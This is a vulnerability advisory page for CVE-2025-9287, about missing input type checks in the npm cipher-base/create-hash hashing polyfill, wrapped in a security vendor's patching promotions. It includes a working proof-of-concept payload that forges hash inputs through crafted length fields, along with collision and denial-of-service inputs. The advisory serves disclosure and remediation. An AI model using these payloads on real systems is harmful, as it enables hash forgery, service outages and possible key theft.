Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2025-9287

cipher-base is missing type checks, leading to hash rewind and passing on crafted data
Back to all
CVE

CVE-2025-9287

cipher-base is missing type checks, leading to hash rewind and passing on crafted data

Summary

This affects e.g. create-hash (and crypto-browserify), so I'll describe the issue against that package

Also affects create-hmac and other packages

Node.js createHash works only on strings or instances of Buffer, TypedArray, or DataView.

Missing input type checks (in npm create-hash polyfill of Node.js createHash) can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.

Details

See PoC

PoC

const createHash = require('create-hash/browser.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
  const hash = createHash('sha256')
  messages.forEach((m) => hash.update(m))
  return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])

Output:

9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
9ef59a6a745990b09bbf1d99abe43a4308b48ce365935e29eb4c9000984ee9a9
Hashed input means safe

This works with:

const forgeHash = (valid, wanted) => JSON.stringify([wanted, { length: -wanted.length }, { ...valid, length: valid.length }])

But there are other types of input which lead to unchecked results

Impact

  1. Hash state rewind on {length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.
  2. Value miscalculation, e.g. a collision is generated by { length: buf.length, ...buf, 0: buf[0] + 256 }

    This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js)

  1. DoS on {length:'1e99'}
  2. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration, like GHSA-vjh7-7g9h-fjfh)
  3. Also, other typed arrays results are invalid, e.g. returned hash of new Uint16Array(5) is the same as new Uint8Array(5), not new Uint16Array(10) as it should have been (and is in Node.js crypto) -- same for arrays with values non-zero, their hashes are just truncated to %256 instead of converted to correct bytelength

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
-
C
H
U
-
C
H
U
-

Related Resources

No items found.

References

Severity

7.4

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
7.4
EPSS Probability
0.00186%
EPSS Percentile
0.40541%
Introduced Version
1.0.0
Fix Available
1.0.5

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading